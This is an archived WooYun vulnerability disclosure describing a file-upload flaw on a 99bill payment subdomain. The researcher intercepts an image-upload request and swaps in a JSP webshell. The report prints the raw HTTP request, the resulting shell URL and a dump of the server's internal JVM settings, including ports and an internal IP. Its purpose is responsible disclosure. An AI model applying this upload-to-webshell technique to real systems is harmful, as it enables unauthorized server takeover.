当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0209324

漏洞标题:快钱某站上传Getshell

相关厂商:快钱

漏洞作者: Vern

提交时间:2016-05-16 16:02

修复时间:2016-07-01 09:00

公开时间:2016-07-01 09:00

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-16: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经确认,细节仅向厂商公开
2016-05-27: 细节向核心白帽子及相关领域专家公开
2016-06-06: 细节向普通白帽子公开
2016-06-16: 细节向实习白帽子公开
2016-07-01: 细节向公众公开

简要描述:

快钱某站上传Getshell 入内网

详细说明:

上传点

https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&contactEmail=123@163.com


000.jpg


上传证件照片时抓包
图片直接选择jsp shell

1111.jpg


POST /nspwebsite/common/nsp/applyBuy.do?method=uploadPic HTTP/1.1
Host: ipos.99bill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&contactEmail=111@163.com
Cookie: JSESSIONID=D5DDB0B8E8F182523A54BFBE1DD0A61D.tomcatServer456-3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------3238940103786
Content-Length: 7326
-----------------------------3238940103786
Content-Disposition: form-data; name="picF"; filename=".jsp


成功get shell
一句话

222.jpg

漏洞证明:

shell:

https://ipos.99bill.com/nspwebsite/common/nsp/file/20160516154400407_.jsp


搜狗截图20160516154431.jpg


11111111111.jpg


内网

java.vendor  Sun Microsystems Inc.
sun.java.launcher SUN_STANDARD
catalina.base /opt/oracle/tomcat/t-3
sun.management.compiler HotSpot 64-Bit Tiered Compilers
catalina.useNaming true
app.path.prefix /nfs/war//tomcat
os.name Linux
sun.boot.class.path /opt/oracle/soft/jdk1.6.0_29/jre/lib/resources.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/rt.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/sunrsasign.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/jsse.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/jce.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/charsets.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/modules/jdk.boot.jar:/opt/oracle/soft/jdk1.6.0_29/jre/classes
java.util.logging.config.file /opt/oracle/tomcat/t-3/conf/logging.properties
com.sun.management.jmxremote
java.vm.specification.vendor Sun Microsystems Inc.
java.runtime.version 1.6.0_29-b11
app.context nspwebsite
heapBin /opt/log/tomcat/3-nspwebsite/dump/heap.hprof.`date +"%Y-%m-%d_%H-%M-%S"`
app.war.name nspwebsite.war
https.port 8043
user.name oracle
shared.loader ${catalina.home}/shared,${catalina.home}/shared/lib,${catalina.home}/shared/lib/*.jar
tomcat.util.buf.StringCache.byte.enabled true
java.naming.factory.initial org.apache.naming.java.javaURLContextFactory
gcLog /opt/log/tomcat/3-nspwebsite/gc/gc.log.`date +"%Y-%m-%d_%H-%M-%S"`
user.language en
sun.boot.library.path /opt/oracle/soft/jdk1.6.0_29/jre/lib/amd64
shutdown.port 10003
http.port 8083
java.version 1.6.0_29
java.util.logging.manager org.apache.juli.ClassLoaderLogManager
user.timezone PRC
allowStart true
sun.arch.data.model 64
java.endorsed.dirs /opt/oracle/tomcat/t-3/endorsed
java.rmi.server.randomIDs true
sun.cpu.isalist
sun.jnu.encoding UTF-8
file.encoding.pkg sun.io
package.access sun.,org.apache.catalina.,org.apache.coyote.,org.apache.tomcat.,org.apache.jasper.,sun.beans.
file.separator /
java.specification.name Java Platform API Specification
java.class.version 50.0
user.country US
java.home /opt/oracle/soft/jdk1.6.0_29/jre
java.vm.info mixed mode
os.version 2.6.32-504.16.2.el6.x86_64
jmx.port 6903
ajp.port 8013
com.sun.management.jmxremote.ssl false
path.separator :
java.vm.version 20.4-b02
java.awt.printerjob sun.print.PSPrinterJob
group
sun.io.unicode.encoding UnicodeLittle
com.sun.management.jmxremote.authenticate true
package.definition sun.,java.,org.apache.catalina.,org.apache.coyote.,org.apache.tomcat.,org.apache.jasper.
java.naming.factory.url.pkgs org.apache.naming
user.home /home/oracle
java.specification.vendor Sun Microsystems Inc.
java.library.path /opt/oracle/soft/jdk1.6.0_29/jre/lib/amd64/server:/opt/oracle/soft/jdk1.6.0_29/jre/lib/amd64:/opt/oracle/soft/jdk1.6.0_29/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
java.vendor.url http://java.sun.com/
java.vm.vendor Sun Microsystems Inc.
common.loader ${catalina.base}/lib,${catalina.base}/lib/*.jar,${catalina.home}/lib,${catalina.home}/lib/*.jar
java.runtime.name Java(TM) SE Runtime Environment
sun.java.command org.apache.catalina.startup.Bootstrap start
java.class.path /opt/oracle/tomcat/t-3/bin/bootstrap.jar:/opt/oracle/tomcat/t-3/bin/tomcat-juli.jar
app.log.path /opt/log
tomcat.working.group
com.sun.management.jmxremote.access.file ../shared/conf/jmxremote.access
java.vm.specification.name Java Virtual Machine Specification
java.vm.specification.version 1.0
catalina.home /opt/oracle/tomcat/t-3
sun.cpu.endian little
sun.os.patch.level unknown
java.io.tmpdir /opt/oracle/tomcat/t-3/temp
java.vendor.url.bug http://java.sun.com/cgi-bin/bugreport.cgi
server.loader
java.rmi.server.hostname 172.21.151.134
jvmRouteName tomcatServer456-3
os.arch amd64
java.awt.graphicsenv sun.awt.X11GraphicsEnvironment
java.ext.dirs /opt/oracle/soft/jdk1.6.0_29/jre/lib/ext:/usr/java/packages/lib/ext
user.dir /opt/oracle/tomcat/t-3/bin
line.separator
java.vm.name Java HotSpot(TM) 64-Bit Server VM
file.encoding UTF-8
com.sun.management.jmxremote.password.file ../shared/conf/jmxremote.password
java.specification.version 1.6


修复方案:

版权声明:转载请注明来源 Vern@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-17 08:57

厂商回复:

感谢您对快钱的关注,我们将立刻安排修复!

最新状态:

暂无


漏洞评价:

评价